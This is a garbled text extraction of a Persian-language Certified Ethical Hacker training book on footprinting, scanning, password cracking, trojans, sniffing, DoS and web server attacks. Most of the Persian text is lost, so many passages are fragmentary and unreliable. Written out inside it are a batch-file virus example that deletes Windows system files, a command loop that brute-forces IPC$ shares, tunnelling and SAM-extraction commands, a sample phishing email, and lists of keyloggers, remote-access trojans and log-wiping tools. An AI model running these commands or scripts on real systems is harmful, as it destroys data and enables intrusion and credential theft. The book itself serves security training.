Professional Documents
Culture Documents
CEH Persian هکر قانونمند
CEH Persian هکر قانونمند
18
enumeration
36
61
87
Sniffer
108
122
142
164
10
178
11
189
12
200
13
IDS honeypot
211
14
223
15
229
CEH
. CEH
.
.
CEH
.
.
.
.
Mohsen_Azarnejad@yahoo.com
90
.
.
.
.
.
.
) (threat .
.
) (exploit
DoS .
exploit :
Remote exploit
.
Local exploit .
IT .
4
) (vulnerability .
.
) (target of evaluation .
) (attack .
.
.
.backdoor Sniffer rootkit exploit buffer overflow SQl injection
.
5
:
.
:
.
:Shrink-wrap code
. Microsoft word
.
:
.
.
.
.
.
) (insider ) (outsider
. .
. .
.
.
:1
.
.
. . ) social
(engineering ) (dumpster diving .
) (sniffing
IP
. :
.
7
IP .
rattling the door knobe
.
.
.
.
:2
.
dialer
sweeper .
IP .
:3
.
.
) (LAN ) (local . session hijacking
DoS .stack-based buffer overflow ) owning the
(system .
:4
.
backdoor
rootkit .
. zombie .
:5
.
log ) (IDS .
steganography log .
Hacktivisim
Hacktivisim . .
deface DoS
. ) (hacktivism .
: .
.
9
: .
.
: . cracker
. .
. .
: .
) (.
cracker
" " !
.
.
cracker
DoS .
. .
.
cracker ) criminal hacker (
. ) (ethical hacker
.
.
10
)(Confidentiality
)(Integrity
)(Availability
. DoS .
DoS .
.
.
.
) (bit-flipping
.
.
11
.
.
.
. .
. .
.
.
.
.
.
.
12
:
http://nvd.nist.gov
www.securitytracker.com
www.microsoft.com/security
www.securiteam.com
www.packetstormsecurity.com
www.hackerstorm.com
www.hackerwatch.org
www.securityfocous.com
www.securitymagazine.com
www.milworm.com
. .
:
.1
.2 ) (NDA
.3
.4
.5
.6
13
.
:
.
.
. :
) :(remote .
.
:dial-up War dialing .
.
: .
.
: .
.
14
:
.
.
: .
rootkit key logger
.
.
) (target of evaluation
.
) (
) (Black box .
.
.
. :
. .
:
.
15
) (
.
.
.
.
) (
.
.
.
16
. .
.
. :
. .
.
.
17
) (footprinting .
footprinting .
. .
.
Footprinting
Footprinting
Footprinting .
.
.
.
Footprinting
Footprinting Footprinting .
.
.
.
19
.
Google hacking http://groups.google.com .
. http://people.yahoo.com http://www.intellius.com
. Google hacking :
Site . .
Filetype .
Link hyperlink .
Cache . .
Intitle .
Inurl . .
.
.
:
IP
.
%90 %10 .
20
. footprinting
. :
Domain name lookup
Whois
Nslookup
Sam Spade
. whois DNS
IP .
.
21
Footprinting :
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTracker Pro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-Mail Spider
DNS Enumeration
DNS DNS Enumeration.
DNS
IP .
ARIN DNSstuff NSlookup Whois
DNS enumeration .
Nslookup DNSstuff
nslookup . DNS
.
Sam Spade nslookup.
Whois nslookup IP
name server
) (AUTH1.NS.NY1.NET IP .
22
Whois
DNSstuff . .
nslookup DNS
http://www.dnsstuff.com DNS .
DNS http://www.eccouncil.org DNSstuff.com .
http://www.eccouncil.org IP .
name server IP .
ARIN IP .
ARIN Whois http://www.arin.net/whois .
Whois http://www.yahoo.com .
Whois .
IP
.
ARIN
.
ARIN http://www.yahoo.com
: ARIN RIPE NCC :
LACNIC .APNIC
24
Whois
( www.networksolutions.com ) Whois
: www.eccouncil.org Whois . Whois
Domain ID: D81180127-LROR
Domain Name: ECCOUNCIL.ORG
Created On: 14-Dec-2001 10:13:06 UTC
Last Updated On: 19-Aug-2004 03:49:53 UTC
Expiration Date: 14-Dec-2006 10:13:06 UTC
Sponsoring Registrar: Tucows Inc. (R11-LROR)
Status: OK
Registrant ID: tuTv2ItRZBMNd4lA
Registrant Name: John Smith
Registrant Organization: International Council of E-Commerce Consultants
Registrant Street1:67 Wall Street, 22nd Floor
Registrant Street2:
Registrant Street3:
Registrant City: New York
Registrant State/Province: NY
Registrant Postal Code: 10005-3198
Registrant Country: US
Registrant Phone: +1.2127098253
Registrant Phone Ext.:
Registrant FAX: +1.2129432300
Registrant FAX Ext.:
Registrant Email:forum@eccouncil.org
Admin ID: tus9DYvpp5mrbLNd
25
Whois :
www.samspade.org
www.geektools.com
www.whois.net
www.demon.net
www.whatismyip.com
subnet mask .
IP . IP
ARIN AINA .
.
IP .
VisualRoute traceroute NeoTrace .
27
.
IP IP
.
DNS
DNS :
:A IP
:SOA DNS
:CNAME
:MX
:PTR IP
traceroute footprinting
Traceroute .
ICMP . ICMP
TTL . .
. tracerout
.
Sam Spade traceroute .
tracert hostname traceroute . traceroute
www.yahoo.com .
28
.
tracert .
3D Traceroute
NeoTrace
VisualRoute Trace
Path Analyzer Pro
Maltego
Email Tracking
Email Tracking
. Email Tracking
.readnotify.com
29
.
.
VisualRoute Mail Tracker eMail Tracker Pro .
Web Spider
Spammer Web Spider .
Web Spider .
Web Spider @ .
Web .
Spider . Web Spider
. Web Spider
robots.txt crawling
.
: robots.txt
.
Footprinting
.1
.2 Whois
30
.3 DNS
.4
.5
.6
.7 People Search
.8 NeoTracer
.9
.10 readnotify.com
.
.
. .
.
.
. .
.
VPN
.
31
.
.
:
:
help desk .
:
.
. phishing .
:
) :(Impersonating an employee or valid user
.
.
.
) :(Posing as an important user
.
.
.
) :(Using a third person
. .
32
Popup
.
.
Phishing
PIN .
33
.
.
phishing .
.
keylogger . worm
.
.
:
Mail server report.
Our firewall determined the e-mails containing worm copies are being sent from your computer.
Nowadays it happens from many computers, because this is a new virus type (Network Worms).
Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the
penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of
itself to these e-mail addresses
Please install updates for worm elimination and your computer restoring.
Best regards,
Customer support service
Pop-up
. Pop-up
.
URL obfuscation
URL .
URL obfuscation URL .
204.13.144.2/Citibank Citibank .
URL obfuscation phishing
34
.
. .
.
192.168.10.5 3232238085 .
.
.
.
.
. .
. .
.
.
.
. .
35
Enumeration
enumeration . enumeration
.
enumeration
.
.
IP
. IP
.
.
.
IP .
37
.
)(Port scanning
)(Network scanning
IP
) (Vulnerability scanning
: TCP/IP .
.
. 80
. .
:
C:\Windows\system32\drivers\etc\services
:
. IP .
: .
service pack
.
.
) (IDS .
TCP/IP
. .
38
.
.
Ping Sweep
.
ping sweep IP .
ping .
ICMP ICMP ping
. ICMP
.
Ping sweep ICMP
.
39
ping sweep .
.
Friendly Pinger Pinger Angry IP Scanner WS_Ping_Pro ICMP
.
Ping Sweep
IDS Ping Sweep IPS
. ping
ping sweep . ping
sweep . ping sweep
.
.
. .
.
.
.
.
.
:
40
IDS .
.
.
. stateful
TCP .
) (NIDS
Nmap .
.
.
Nmap
Nmap ping sweep IP
. Nmap
.
Nmap .
.
Nmap .
Nmap Nmap .
. .
Nmap
TCP connect
XMAS tree scan
TCP .
TCP XMAS-tree .
flag URG FIN PSH .
) (half-open . SYN
41
. TCP . SYN-ACK
.
Null scan
Windows scan
ACK scan
: . Nmap
Nmap
-sT
-sS
-sF
-sX
-sN
-sP
-sU
-sO
-sA
-sW
-sR
-sL
-sI
-Po
-PT
-PS
-PI
-PB
-PB
-PM
-oN
-oX
-oG
-oA
-T Paranoid
-T sneaky
TCP connect scan
SYN scan
FIN scan
XMAS tree scan
Null scan
Ping scan
UDP scan
Protocol scan
ACK scan
Windows scan
RPC scan
List/DNS scan
Idle scan
Don't ping
TCP ping
SYN ping
ICMP ping
TCP and ICMP ping
ICMP timestamp
ICMP netmask
Normal output
XML output
Greppable output
All output
Serial scan; 300 sec between scans
Serial scan; 15 sec between scans
42
-T polite
-T Normal
-T Aggressive
-T Insane
Hping2 10.0.0.5 p 80
80 .
Hping www.debian.org p 80 A
80 www.debian.org ACK .
Hping www.yahoo.com p 80 A
IPID .
43
44
flag TCP
TCP )(3-way handshake
. .
TCP SYN . TCP SYN ACK
.
ACK .
45
TCP ) (connection-oriented
. flag .
TCP flag PSH URG SYN RST ACK FIN . flag TCP
:
:(Synchronize) SYN .
:(Acknowledge) ACK .
:(Push) PSH .
:(Urgent) URG .
:(Finish) FIN .
:(Reset) RST .
flag TCP .
TCP
flag .
Flags sent by hacker
)All flags set (ACK, RST, SYN, URG, PSH, FIN
FIN
No flags set
SYN, then ACK
SYN, then RST
46
XMAS Scan
XMAS scan
FIN scan
NULL Scan
TCP connect/full-open scan
SYN scan/half-open scan
FloppyScan
.
mini Linux NMAP .
FloppyScan .
IPEye TCP Null FIN SYN XMAS .
) (Command-Line IPEye . .
) (closed . ) (reject
. ) (drop
. ) (open
.
IPSecScan IP IPSec
.
Hping2
traceroue mode ICMP UDP TCP .
47
War-Dialing
War dialing
. war dialing
dial-up War dialing .
.
remote access
remote-access .
. PAP
VPN .
War-dialing ) (dial-in .
.
war-dialing .
THC-Scan, ModemScan, ToneLoc, Phonesweep, war dialer telesweep
.
.
.
48
Banner Grabbing
Banner Grabbing TCP/IP
.
. Banner grabbing .
. FTP
telnet . Microsoft Exchange
.
.
TCP .
.
.
sniffing .
IDS .
telnet banner grabbing .
telnet www.certifiedhacker 80 head / http/1.0
pof .
> pof I <your interface card number . Httprint Miart
HTTP Header . PING XPROBE2
Netcraft V2 .
:
Bidiblah
SAINT
ISS Security Scanner
)Nessus (for Softwares
49
GFI LANGuard
SATAN
Retina
Nagios
)NIKTO (for Web Servers
SAFEsuite Internet Scanner
IdentTCPScan
:
FriendlyPinger
LANsurveyor
Ipsonar
LANState
. )(proxy server
.
.
.
.
50
:
SocksChain
Proxy Workbench
ProxyManager
Super Proxy Helper
MultiProxy
TOR Proxy Chaining Software
Proxy Finder
ProxyBag
AutomatedProxy Leecher
) (Anonymizer
.
.
) (Anonymizer
51
.
.
:
StealthSurfer
Browzar
Torpak Browser
GetAnonymous
IP Privacy
Anonymity 4 Proxy
Psiphon
AnalogX Proxy
NetProxy
Proxy+
ProxySwitcher Lite
JAP
Proxomitron
HTTP Tunneling
IDS ) (SMTP
) (HTTP . IDS
.
HTTP HTTP
tunneling ) IM (
.
Httptunnel
HTTP telnet
. hts 80
23 :
Hts F server.text.com:23 80
52
htc . P
.
htc -P proxy.corp.com:80 -F 22 server.test.com:80
telnet localhost 80 80
23 .
IP Spoofing
IP .
(IP Spoofing) IP TCP .
53
) (source routing
. IDS
.
.
Enumeration
enumeration
.
.
enumeration
. .
IP .
IP MAC address .
54
Null Session
Null session NetBIOS null .
sessions CIFS SMB.
SMB / CIFS .
Windows:
$ smbclient \\\\target\\ipc\$ U
Linux:
net use
.
:
.GetAcct user2sid sid2user enum SuperScan Nbtstat NetView DumpSec
Null Session
Null sessions 139 137 135 TCP 445 .
. SMB
) (TCP/IP WINS client .
:
.1 properties .
.2 TCP/IP Properties .
.3 Advanced .
.4 WINS disable NetBIOS Over TCP/IP .
.
:
Regedt32 .1 HKLM\SYSTEM\CurrentControlSet\LSA.
.2 Edit Add Value :
Value name: RestrictAnonymous .a
Data Type: REG_WORD .b
Value: 2 .c
56
PS Tools enumeration . .
:PsExec
:PsFile
:PsGetSid SID
:PsKill
:PsInfo
:PsList
:PsLoggedOn local share
:PsLogList log
:PsPasswd
:PsService
:PsShutdown
:PsSuspend
:PsUptime
SNMP Enumeration
SNMP
SNMP . SNMP agent :
SNMP management station agent .
SNMP
agent SNMP management station .
agent agent Trap . management station
57
agent MIB .
.
SNMP SNMP agent management station
. read community string .
. read/write community string
. read community string public
read/write
SNMP enumeration
SNMP enumeration SNMP agent
SNMP . SNMP community
string . Group Policy
SNMP .
enumeration
.
:
.1 enumeration .
.2 null session .
.3 Windows enumeration Superscan .
60
.
.
.
.
.
.
.
brute-force .
.
:
.1 ) Administrator .(Guest
.2 .
.3 .
.4 .
.5 .
62
.
.
.
hash .
hash hash .
hash
.
SAM shadow .
Legion NetBIOS .
IP share .
NTInfoScan NT 4.0 NTInfoScan .
HTML .
Smbbf SMB .
53000 .
L0phtCrack . dictionary
brute-force hybrid.
John the Ripper Unix NT .
case insensitive .
63
LanManager Hash
2000 NT Lan Manager (NTLM) hashing
. NTLM hashing . 123456abcdef .
NTLM .123456ABCDEF :
blank 14 .123456ABCDEF__ :
14 123456A : __ .BCDEF
:
123465A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15
hash 6BF11E04AFAB197F F1E9FFDCC75575B15 .
NTLM v1 LM NTLM v2
LM
NTLM v1
NTLM v2
hash
56bit+56bit
hash
MD4
MD4
hash
64bit+64bit
128bit
128bit
C/R
56bit+56bit+16bit
56bit+56bit+16bit
128bit
C/R
HMAC_MD5
C/R
64bit+64bit+64bit
64bit+64bit+64bit
128bit
64
2000
SAM hash
Windows\system32\config .
. SAM
DOS Linux CD . repair
. RDISK ) (rdisk /s
SAM __ SAM. c:\windows\repair .
cmd :
C:\>expand sam.__ sam
L0phtCrack dictionary
brute-force hybrid .
Win32CreatedLocalAdminUser x
administrator . Metasploit
Metasploit framework .
Offline NT Password Resetter administrator .
CD Linux NTFS
.
LCP XP 2000 NT 2003
Hybrid Dictionary Brute force.
Asterisk Logger Access Pass View Crack Ophcrack2 SID&User
Asterisk Key .
65
SMB Logon
SMB logon
. NTLM sniff
.
SMB Server .
.
SMB :
SMBRelay SMB Server hash SMB
SMBRelay . man-in-the-middle .
SMBRelay2 SMBRelay IP NetBIOS
.
Pwdump2 hash SAM .
L0phtCrack .
Samdump NTLM hash SAM .
C2MYAZZ
. .
66
. 8 12 .
hash
67
. SYSKEY
log . brute-force
.
hash . 15
LM hash NT hash LM hash NT hash
brute force . LM hash SAM
. NTLM v2 NTLM Kerberos NT hash
LM LM hash NT hash . 98 95
:
:1 Group Policy Security Options Local Security Policy
Network security: Do not store LAN Manager hash value on next password change :
:2 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash .
:3 15 .
:
.1 .
.2 .
.3 whois
.
.4 .
.5 21 .
68
) (expire
.
.
. 30 .
.
69
.
:
. EC Council
:
o )($,:"%@!#
o
o
o
70
. :
:Passive online . passive online
man-in-the-middle sniffing reply.
:Active online Administrator . active online .
:Offline hybrid Dictionary brute-force.
Shoulder surfing :Nonelectronic .
Passive Online
passive online .
.
. hash
. hashing
toolkit
.
71
Active Online
. active online
.
.
.
.
Windows shell NET
USE . :
.1 Windows Notepad username password .
Dictionary Generator .
C: drive as credentials.txt .
.2 pipe FOR:
)C:\> FOR /F token=1, 2* %i in (credentials.txt
.3 net use \\targetIP\IPC$ %i /u: %j credentials.txt
share .
.
. .
.
) ( .
) ( )(
.
73
.
.
. .
:
Dictionary attack
Administrator
Hybrid attack
Adm1n1strator
Brute-force attack
Ms!tr245@F5a
.
. hash
. hash hash
.
.
hybrid .
.
1 .
brute-force . brute-
force .
.
74
Pre-Computed Hashes
hash
. hash
.
Nonelectronic
.
sniff shoulder surfing .
.
. help desk
.
.
Shoulder surfing .
.
.
.
.
.
75
:
http://www.defaultpassword.com
http://www.cirt.net/passwords
http://www.virus.org/default-password
PDF Password Cracker Abcom PDF Password Cracker
PDF .
keylogger spyware
keystroke logger
(keylogger) keystroke logger . .
keystroke logger
. keylogger
.
Keylogger
Keylogger .
.
Spector ) (spyware
.
Anti-spector . .
76
eBlaster
eBloster .
.
SpyAnywhere
SpyAnywhere .
history .
Fearless Key Logger .
log .
E-mail Keylogger .
/ .
.
Keylogger :
Revealer Keylogger
Handy Key Logger
Ardamax Keylogger
Powered Keylogger
ELITE Keylogger
Quick Keylogger
Spy-Keylogger
Perferct Keylogger
Invisible Keylogger
Actual Spy
Spytector FTP Keylogger
IKS Software Keylogger
Ghost Keylogger
.
.
.
77
.
.
.
administrator
.
GetAdmin.exe administrator .
NT .
GetAdmin.exe . . Windows NT
4.0 SP3 .
HK.exe admin administrator .
Active@ Password Changer administrator local.
x.exe X X
administrator.
administrator
. back door
) ( keystroke logger
. .
78
PsExec .
.
Remoxec RPC DCOM .
Task Scheduler DCOM .
Alchemy Remote Executer
.
Esma FlexInfo Pro
CPU usage ....
Buffer Overflows
) Buffer overflows ( .
.
. cmd shell .
Rootkit
Rootkit .
Rootkit backdoor .
backdoor Rootkit .
rootkit
.
79
rootkit :
:Kernel-level rootkits rootkit
doorback .
Kernel-level rootkit .
.
:Library-level rootkits rootkit ) (library
.
:Application-level rootkits rootkit
patch .
Rootkit 2000 XP
Windows NT/2000 rootkit Rootkit .
NT kernel Rootkit .
blue scrren
EXE .
Rootkit kernel mode device driver _root_.sys
DEPLOY.EXE . _root_.sys DEPLOY.EXE
DEPLOY.EXE . rootkit
. DEPLOY.EXE . _ net stop _root
_ rootkit net start _root stop restart . rootkit _root_.sys
.
80
rootkit
rootkit administrator
. rootkit
.
MD5 checksum . 128 MD5 checksum
. checksum .
. checksum
.
Tripwire .
checksum Tripwire
.
.
. .
attrib . attrib :
]Attrib +h [file/directory
NTFS data streaming .
NTFS alternate data streams
. .
81
NTFS Stream
stream file FAT
NTFS . FAT stream
streaming NTFS .
LNS.exe NTFS streams . steam
.
82
Steganography
Steganography .
. steganography .
ImageHide steganography .
.
. sniffer
.
Blindside steganography BMP .
MP3Stego .
MP3 bit stream .
Snow whitespace steganography ASCII
whitespace . whitespace
.
.
Camera/Shy IE
gif .
Masker Steganography .
83
steganography :
wbStego Gifshuffle Pretty Good Envelop Steganos Steghide S- Tools Blindside Fort Knox
.Video Steganography FoxHole Stegomagic StegaNote Cloak Hydan Data Stash OutGuess
steganography .
Stegdetect steganographic
Steganography .
Dskprobe CD 2000 .
steganography .
.
.
.
84
Auditing
auditingauditing .
log Windows Event Viewer .
Event log .
.
.
AuditPol auditing .
.
Event Log
Windows Event Viewer .
.
auditing
Event Viewer
AuditPol
auditing .
event log .
85
Elsave.exe event log . .
WinZapper security log
2000 WinZapper . .
Evidence Eliminator data cleaning
. system files Internet cache Recycle bin
temp folders ... Evidence Eliminator .
.
:
Traceless
Tracks Eraser Pro
Aromor
ZeroTracks
PhatBooster
86
backdoor
:
. backdoor toolkit
.
worm backdoor .
backdoor
. backdoor worm
.
.
backdoor
Backdoor
. backdoor log
backdoor
.
backdoor .
backdoor .
.
. backdoor :
88
log . backdoor
.
RAT backdoor
. RAT
. backdoor RAT
: .
.
.
. DDOS
.
.
.
: IRC
. spyware
89
.
.
.
.
Protocol
UDP
UDP
TCP
TCP
TCP
TCP
TCP
Port
31337 or 31338
2140 or 3150
12345 and 12346
12361 and 12362
20034
21544
3129, 40421, 40422, 40423, and 40426
Trojan
BackOrifice
Deep Throat
NetBus
Whack-a-mole
NetBus 2
GirlFreind
Masters Paradise
overt covert
overt . covert
.
covert .
covert
.
Covert
. 80 .telnet
90
Loki shell ICMP
backdoor . ICMP .
Loki .
91
. :
:Data-Sending Trojans .
:Destructive Trojans .
:Proxy Trojans .
Reverse-connecting
reverse-connecting
.
.reverse WWW shell ) 60(
.
92
93
HKEY_CURRENT_USER\NetBus
Server\General\TCPPort . NetBus
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
NetBus Server .
BackOrifice 2000
TCP/IP BackOrifice .
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Plug-in . BackOrifice
remote desktop 3DES
UDP ICMP . ...
ComputerSpy Key Logger
: AIM AOL MSN ICQ Yahoo
Messanger .webmail
.
Beast WinLogon.exe .
Windows Explorer Internet Explorer .
all-in-one
.
CyberSpy Telnet Trojan
.
ICQ TCP/IP .
SubRoot 1700
.
LetMeRule .
Cmd .
.
94
Firekiller 2000 .
ATGuard
.
Hard Drive Killer Pro DOS
. .
) ( 1 2
.
Satellite- Turkojan DownTroj Biorante RAT T2W Backdoor.Theef :
HackerzRat SharK Rapid Hacker Poison Ivy Trojan.Hav-Rat DarkLabel B4 Yakoza RAT
AccRat OD Client ProAgent Optix PRO VicSpy Criminal Rat Beta 1337 Fun Trojan TYO
VNC Trojan TinyFTPD ZombieRat ConsoleDevil SINner RubyRAT Public Mhacker-PS
DaCryptic Dark Girl ProRat Troya Biohazard RAT Skiddie Rat DJI RAT Webcam Trojan
.Hovdy.a PokerStealer.A Net-Devil
Netcat
Netcat TCP UDP
. telnet shell .
.
CD-ROM background screen saver
.
.
:
.
95
Start .
ISP IP scanning .
taskbar .
Ctrl+Alt+Del .
Wrapping
Wrapper .
.
. wrapper
.
.
96
Graffiti .
.
.
RemoteByMail .
.
.
.
signature .
Trojan Horse Construction Kit Senna Spy Generetor :
Progenic Mail Trojan Construction Kit v2.0 .Pandoras Box
97
spyware .
backdoor
.
.
.
.
backdoor
.
.
98
Ethereal .
Trojan scanner .
Tripwire .
hash . Tripwire
.
.
Hijack Autoruns What's Running Super System Helper CurrPorts :
.Startup List This
2003 (Windows File Protection) WFP
. TTF OCX DLL SYS EXE
WFP .
.
sigverif .
sigverif :
.1 Start .
.2 Run .
.3 sigverif start . .
System File Checker
.
Windows\system32\dllcache overwrite . System File Checker
sfc/scannow.
XoftspySE Comodo BOClean TrojanHunter :
.SPYWAREfighter Spyware Doctor
100
worm
worm
. worm backdoor .
worm backdoor
.
worm
worm ) (malware .
.
. :
.
101
: ) (Infection ).(Attack
EXE
:
fragment :
102
Internet Explorer
worm worm .
. worm
.
103
: .
:
DLL INI
) (BAT
)(Source code
:
) polymorphic ( :
.
:Stealth
.
:Sparse infector .
:Armored .
104
:Cavity .
:Tunneling
.
) Companion( : .
companion notepad.com notepad.exe
) notepad.com ( .
) Camouflage( : .
:Bootable CD-ROM CD-ROM
. CD-ROM
. CD-ROM
.
105
) (batch file Game.bat :
@ echo off
*Del c:\winnt\system32\*.
*Del c:\winnt\*.
bat2com Game.com .
WINNT
.
. :
Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00
.
.
.
.
106
checksum
)(virus signature
:
.1 . .
.2 netstat.exe fport.exe listdlls.exe handle.exe
pslist.exe .
.3 .
.
.4 .
.
Notepad EICAR.COM
. .
*X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H
107
Sniffer
Sniffer .
. sniffer
.
Sniffer .
sniffer sniffer
.
sniffer . sniffer
sniffer .
sniffer MAC address MAC
address . ) (promiscuous mode .
MAC address
. ) (promiscuous mode
sniffer . ) (promiscuous mode
. promiscuous-mode
.
sniffing . HTTP
SNMP POP3 FTP sniffer
.
109
Ethereal sniffer .
WireShark Ethereal .
.
.
Snort ) (IDS .
buffer overflow Server Message Block (SMB) CGI
probes OS fingerprinting .
WinDump tcpdump .
WinDump tcpdump rule
.
EtherPeek .
OmniPeek .
WinSniffer .
IMAP Telnet SMTP ICQ HTTP POP3 FTP NNTP .
Iris
. sniffer Iris
.
.Wiretap Pilot Look@LAN The Dude Sniffer :
: . ) (passive sniffing
.
) (active sniffing ARP spoofing traffic-flooding
.
110
.
passive packet sniffer
. .
MAC address . MAC table
MAC address .
MAC address
.
.
111
ARP Poisoning
ARP IP MAC . TCP/IP
MAC address .
ARP MAC address . ARP
broadcast : IP
IP ARP MAC address TCP/IP
.
ARP poisoning
sniff ARP poisoning .
ARP ARP spoofing .
MAC address .
) (DoS . ARP spoofing man-in-the-middle
ARP spoofing
.
112
113
MAC Duplicating
MAC duplicating sniff MAC address
.
MAC address .
. MAC filtering
.
Capture Ethereal
Ethereal .
:
114
MAC Flooding
sniffer .
.
.
sniffer ARP spoofing : .flooding
ARP spoofing MAC address gateway
gateway sniffer .
flood .
sniffer
.
115
DNS Poisoning
(DNS poisoning) DNS poisoning DNS
. DNS
. URL
DNS IP . DNS
.
.
IP DNS IP
.
.
worm .
DNS poisoning :
:Intranet spoofing .
:Internet spoofing .
117
DNS IP .
.
EtherFlood flood .
.
Dsniff .
urlsnarf msgsnarf mailsnarf filesnarf webspy .
.
Sshmitm webmitm man-in-the-middle SSH HTTPS .
dnsspoof Arpspoof macof
sniffer .
Cain & Abel
brute force VoIP
.
Packet Crafter TCP/IP/UDP .
flage .
SMAC MAC address MAC address
.
MAC Changer MAC address . MAC
MAC MAC MAC MAC
address .
WinDNSSpoof DNS ID spoofing .
sniff . ARP
spoofing flooding .
Distributed DNS Flooder DoS DNS .
119
DNS .
:
SmartSniff MSN Sniffer Win Sniffer Ace Password Sniffer Effetech ArpSpyX Ettercap
AW Cloasoft EtherLook NetIntercept Etherpeek Snort EtherApe Ntop NetSetMan SMAC
URL Snooper BillSniff Sniphere NetResident Sniffem CommView Ports Traffic Anakyzer
.EtherScan Analyzer Ipgrab AnalogX Packetmon EtherDetect Packet Sniffer
.
. AES
RC4 RC5 VPN
. packet sniffer
. sniff SSH.
sniffer :
Ping method
ARP method
Latency method
IDS
120
netINTERCEPTOR .
.
sniffer .
Sniffdet sniffer TCP/IP Sniffdet .
promiscuous mode sniffer
.
Antisniff Promiscan ARP Watch Prodetect
sniffer .
121
DoS
.
.
) session hijacking ( . DoS
. session
hijacking .
session hijacking man-in-the-middle .
123
Denial of Service
DoS . DoS .
DoS (BOTs) robot robot
) (BOTNETs smurf SYN flooding DoS DDoS .
DoS
DoS : DoS ) DoS(
).(DDoS
. DoS :
:
.
DoS
. DoS
) .(DDoS
Jolt2 DoS IP .
.
Bubonic DoS TCP
.
124
Ping of Death IP
Ping of Death .
.
SSPing ICMP
.
A LAND Attack IP IP .
loop
.
CPU Hog DoS CPU
.
WinNuke 139 IP
. (OOB) Out of Bounds
) (buffer overflow .
Targa DoS .
.
RPC Locator .
DoS DoS .
Trinoo UDP DDoS Trinoo master .
DoS Master . agent
) daemons ( ) (
IP . Trinoo agent . daemon
buffer overflow WinTrinoo . Trinoo
Trinoo.
Shaft Trinoo UDP master agent .
flood
Shaft . ICMP UDP TCP flooding.
Stacheldraht TFN UDP flood ICMP flood TCP SYN
. telnet ) ( agent
) ( . .
126
zombie BOT .
.
IP .
DDoS :
Master/ Handler
Slave/ secondary victim/ zombie/ agent/ BOT/ BOTNET
Victim/ primary victim
master slave . master Vitim .
master . slave .
127
DDoS . intrusion
DDoS slave . attack
slave .
:DDoS
128
BOT BOTNET
BOT ) (web robot .
)spammer( BOT
. BOT .
BOTagent . web crawler )spider(
.
BOT
. BOT IRC
. BOT
... .
BOTNET BOTBOTNET . DDoS
SMTP
. BOTNET
DDoS BOT .
129
smurf
smurf ICMP IP
broadcast . ICMP
. broadcast
. DoS ping flood.
IRC smurf .
SYN flooding
SYN flood TCP
. SYN
130
IP . IP ) (spoofed
TCP .
" "
. SYN flood SYN cookies :
Micro Blocks RST cookies .Stack Tweaking
DoS DDoS
DoS .
:
:network-ingress
network-ingress .
.
:rate-limiting
. traffic shaping .
: slave master agent
.
.
. IDS TFN Trinoo Stacheldraht
signature .
:Host-auditing
DDoS .
:Network-auditing agent DDoS
.
:
.
131
Find_ddos DoS
.
SARA .
.
RID TFN Trinoo Stacheldraht .
Zombie Zapper zombie ) (sleep
. .
Session Hijacking
Session hijacking
Session hijacking . ID
Session hijacking . sequence number
.
132
Spoofing Hijacking
spoofing hijacking . spoofing
spoof
) (.
hijacking .
) (.
133
Session hijacking :
: sequence number .
: RST FIN
.
: TCP sequence number
.
session hijacking
Session hijacking : .
.
sequence number TCP .
.
.
.
134
:TCP
TCP . TCP ACK
sequence number . TCP session hijacking .
TCP :
.1 . SYN sequence number
) (ISN .
.2 SYN ISBN ACK
sequence number .
.3 ACK sequence number.
timeout flag FIN RST .
RST
. FIN
. FIN
RST .
sequence
TCP .
(SN) sequence number .
.
sequence number .
TCP SYN . synchronizing
sequence number ) (ISN ISN .
4 .
ACK sequence number
. sequence number
. 1 .
) 45
ACK sequence number 45 (.
135
136
session hijacking
session hijacking :
: sequence number .
: TCP RST FIN
. DoS .
: TCP sequence number
.
137
:session hijacking
TCP/IP Hijacking
TCP/IP hijacking
.
. .
.
138
RST Hijacking
RST hijacking (reset) RST . ACK number
. reset
.
Blind Hijacking
TCP
) (source routing .
.
Juggernaut sniffer (hijack TCP session) TCP .
"" .
hijacking .
Hunt Hunt .
ARP spoofing MAC address
TCP .
139
session hijacking
TCP session hijacking .
TCP/IP .
Session hijacking
ISN sequence number .
sniff .
session hijacking :
session hijacking .
140
session hijacking
session hijacking .
.IPSec
.
.
SSH SSL.
session hijacking
) (remote
.
VPN .
.
.
Session hijacking :
141
.
.
.
.
.
24 7
.
.
. patch
.
.
:
DMZ
.
) defacement ( .
deface Deface .
. .
deface :
administrator man-in-the-middle
administrator brute-force
DNS
FTP e-mail
)(permission
Telnet SSH
URL poisoning
extension
144
directory
145
N-Stalker Web Application Security Scanner
buffer overflow SQL injection cross-site scripting parameter-
tampering .
Metasploit framework .
.
.
.
IISxploit.exe directory traversal exploit IIS
Unicode string .
) ASP Trojan (cmd.asp
. backdoor
.
CleanIISLog log IIS IP .
W3SVC IP
ServerMask SAINT Vulnerability Scanner CORE IMPACT :
.Neosploit MPack LinkDeny HTTPZip CasheRight ServerMask ip100
146
patch
hotfix .
. hotfix service
pack . pacth patch .
patch patch . patch
. patch patch
Microsoft St. Bernard PatchLink
patch . UpdateExpert :
.HFNetChk Qfecheck
:
: www.securityseers.com
: Nessus Security Scanner Snort .Nmap
: XVScan SANE .Parallel Port
Whisker
.
147
:
N-Stealth HTTP Vulnerability Scanner
WebInspect
Shadow Security Scanner
SecureIIS
ServersCheck Monitoring
GFI Network Server Monitor
Servers Alive
Webserver Stress Tool
Secunia PSI
.
:
administrator
WebDAV
) directory browsing (
patch
logging auditing
80 443
GET POST
148
Patch update:
MBSA
Auditing :logging
log IIS
:Script Mapping
WebDAV
quest
administrator
Administartor
149
:ISAPI Filters
ISAPI
NTFS
NTFS
:IIS Metabase
NTFS metabase
Share:
80 443
.
.
. google hacking .
150
.
.
/
. .
.
.
.
.
.
.
:
. :
151
. :
:Cross-site scripting
cross-site scripting .
.
.
:XSS XSECURITY )( .
